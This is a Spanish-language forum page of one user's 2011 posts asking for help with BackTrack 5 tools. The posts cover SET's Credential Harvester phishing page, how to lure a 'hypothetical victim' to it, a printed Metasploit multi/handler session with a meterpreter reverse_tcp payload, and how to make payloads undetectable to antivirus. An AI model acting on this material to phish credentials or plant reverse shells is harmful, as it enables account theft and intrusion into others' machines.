Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - VIPbie

#11
Que opinan de instalarse uno un apache2 para recibir la peticion en el localhost? funcionaría?
#12
Cita de: tragantras en 27 Junio 2011, 16:14 PM
wtf?

como le vas a enviar la 127.0.0.1, esa dirección es "localhost", solo visible por tí, tienes que enviarle tu IP pública, con la consiguiente redirección de puertos del router ( NAT )
Exactamente ese es mi punto... obviamente el localhost es solo visible x mí, solo necesito que se conecte durante un momento en 'tiempo real' a donde se esta ejecutando la pagina falsa y que entiendo es el puerto 80 de mi Router (o me equivoco?) y por eso es mi pregunta. No se si usando NO-IP la redirecciona hasta mi IP publica y x ahí via (NAT) al puerto de mi router. o si se puede hacer directamnte ese redireccionamiento. La verdad.. no sé como hacerlo. Si alguien tiene algun manual, me encantaría leerlo, igual mas alla de infectar a alguien, lo q me interesa es aprender un poco sobre el funcinamiento de Iptables y todo esto.
¿Que utilidad puede tener el NetCat en este caso?
Weno..estamos para aprender ¿o no?
#13
En lo que he entendido hasta ahora de lo que he leído:

Debo lograr enviar a mi hipotética víctima, un enlace que lo conecte a mi http://127.0.0.1:80 en donde se está ejecutando la pagina fake que creó el SET. ¿Como se logra redireccionar una pagina o un enlace cualquiera para que se conecte a mi localhost?
Esa es mi pregunta.
#14
Hacking / 5. Mass Mailer Attack
27 Junio 2011, 05:16 AM
Al intentar la opción 5 de SET en BT5, me aparece esto:
5.  Mass Mailer Attack

Something went wrong, printing the error: unindent does not match any outer indentation level (smtp_web.py, line 178)

Qué significa esto?
Gracias por cualqueir hint.

#15
Hacking / Credential Harvester Attack Method
27 Junio 2011, 04:46 AM
He estado probando varios de los jugetes que trae este BT5 que me tiene encantada, ademas me ha hecho leeer como nunca y eso me gusta.
El 'Credential Harvester Attack Method', me tiene un poco confundida, yo lo usé y efectivamente registra en la consola el user y el passwd que se escriba en la fake creada x el programa, si abres http://127.0.0.1:80
Mi pregunta es (puede que esto les suene tonto, pero en verdad estoy comenzando a comprender como funciona el SET), como puedes hacer para enviarselo a alguien y que esta persona se conecte a esa webfake? (ademas que debes esta en 'tiempo real, escuchando en ese puerto' en el caso de que la hipotetica victima se loguee).
¿Como es que en realidad funciona esto?
#16
Hakr, ya estoy mirando como pasar los AV's es posible que sea eso. Voy a  ver que resultados me siguen dando esas pruebas. gracias.
#17
Estoy haciendo pruebas en mis maquinas y ....miren, la cosa va por aquí:

msf > use exploit/multi/handler
msf exploit(handler) > set LHOST 192.168.0.5
LHOST => 192.168.0.5
msf exploit(handler) > set LPORT 5555
LPORT => 5555
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set EndOnSession false
EndOnSession => false
msf exploit(handler) > set RHOST 192.168.0.7
RHOST => 192.168.0.7
msf exploit(handler) > set RPORT 4244
RPORT => 4244
msf exploit(handler) > exploit


  • Started reverse handler on 192.168.0.5:5555
  • Starting the payload handler...

    Y ahí se queda...
    En los tutoriales que he visto, arroja enseguida una conexión....
    ¿Que no esto teniendo en cuenta?
#18
Hay otra cosa que quisiera saber...
Estoy haciendo unas pruebas despues de usar el nmap. Cuando me sale lo siguiente, ¿qué significa exactamente?
Handler failed to bind to...xxx.xxx.xxx.xxx
¿Qué es lo que está fallando ahí?
#19
Uy espera ahí Hakr , como se cifra el payload para que sea indetectable a los antivirus?? eso sí no lo sabía!

Citarno se nada pero si pudieras decirme donde encontrar el tutorial ese que tenes estaria agradecido.
WebRipper, cuando dije: 'según el manual' me refería a lo que leí en muchísimos manuales que he encontrado tanto en youtube como en paginas especializadas, he seguido al pie de la letra, he recogido una recopilación de posts, videos y cosas; sobre todo estoy leyendo mucho y tratando de comprender muchas cosas, es complejo pero me encanta!
#20
Hacking / Pregunta metasploit v3.7.1-release
13 Junio 2011, 20:45 PM
Hola hola!
Quisiera hacerle unas preguntas relacionadas con el uso de esta herramienta.
Estoy apenas relacionándome con ella, recien tengo BT5. y estoy haciendo  pruebas con mis equipos.
Siguiendo un tutorial,  cree el ejecutable con

set PAYLOAD windows/meterpreter/reverse_tcp

Luego con el Msfconsole: use exploit/multi/handler

y pues le hago todo segun el manual, lo meto en una usb y lo ejecuto en la maquina W. enseguida me dió el control absoluto y puedo hacer lo q desee ahi..

Mi pregunta es: esto se puede hacer esto sin que tenga el acceso fisico a la maquina y sin tener que desactivar el AV?

Gracias x cualquier info.